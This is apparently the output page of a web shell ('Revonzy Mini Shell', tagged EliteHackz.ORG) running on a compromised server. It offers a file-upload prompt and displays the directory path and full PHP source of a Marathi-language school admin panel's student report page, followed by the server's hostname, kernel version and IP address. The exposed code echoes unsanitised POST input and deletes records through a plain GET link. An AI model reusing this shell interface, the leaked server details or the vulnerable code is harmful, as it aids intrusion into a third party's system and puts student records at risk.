Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/www/panel.atsevairag.com/old2/atse_admin_panel007/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/www/panel.atsevairag.com/old2/atse_admin_panel007/student-report.php

<?php

	require_once("../lib/class/functions.php");
	
	$db = new functions();
	
	$current_page = "";
	
	if(!isset($_SESSION['current_admn_email']))
	{	
		header("Location:/atse_admin_panel007/index.php");
	}
 	if(isset($_POST['search_std_btn']))
	{
		$center_name	=	$_POST['center_name'];
		$school_name	=	$_POST['school_name'];
		echo $center_name;
		echo $school_name;
	}
	
?>
<html>
<head>
	<meta charset="UTF-8">
	<title>ATSE Vairag</title>
	
	<link rel="stylesheet" type="text/css" href="/css/stylesheet.css" />
	
</head>
<body>

	<?php
		require_once('header.php');
	?>
	<div style="min-height:570px;">
		<div class="admin-mid-section">
			<br />
			<center><strong>विद्यार्थी लिस्ट</strong></center>
			<hr />
			<table class="centre_tab" border="1" cellspacing="0">
				<tr style="background-color:#EFEFEF;">
				    <td width="50">अ. क्र.</td>
					<td width="50">विद्यार्थ्यांचे नाव</td>
					<td width="180">इयत्ता</td>
					<td width="200">माध्यम</td>
					<td width="100">केंद्र</td>
					<td width="100">शाळा</td>
					<td width="80">स्टेटस</td>
					<td width=""></td>
					
				</tr>
			<?php
				$centres_list = array();
				$centres_list = $db->get_student_list_by_center_and_school($center_name,$school_name);
				
				if(!empty($centres_list))
				{
					$count = 0;
					foreach($centres_list as $centre)
					{
						$id			=	$centres_list[$count][0];
						$center_name=	$centres_list[$count][1];
						$standard	=	$centres_list[$count][2];
						$medium	=	$centres_list[$count][3];
						$full_name	=	$centres_list[$count][4];
						$school_details	=	$centres_list[$count][5];
						
			?>
				<tr>
					<td width="50"><?php echo $id; ?></td>
					<td width="200"><?php echo $full_name; ?></td>
					<td width="100"><?php echo $standard; ?></td>
					<td width="100"><?php echo $medium; ?></td>
					<td width="200"><?php echo $center_name; ?></td>
					<td width="200"><?php echo $school_details; ?></td>
					<td width="120"><select>
					<option value="Approved">Approved</option>
					<option value="Pending">Pending</option>
					</select></td>
					
					<!--<td width="60"><a href="edit-center.php?edt_center_id=<?php //echo $id; ?>">Edit</a></td>-->
					<td width="60"><a href="<?php echo $_SERVER['PHP_SELF']."?center_del_id=".$id; ?>" class="delete_link_report" id="center_delete_link">Delete</a></td>
				</tr>
			<?php		
						$count++;
					}
				}
				else
				{
			?>
				<tr>
					<td colspan="10">कोणतेही विद्यार्थ्यांची नोंद केलेले नाही</td>
				</tr>	
			<?php
				}
			?>
			</table>
		</div>
			</div>
	<?php
		require_once('footer.php');
	?>

</body>
</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4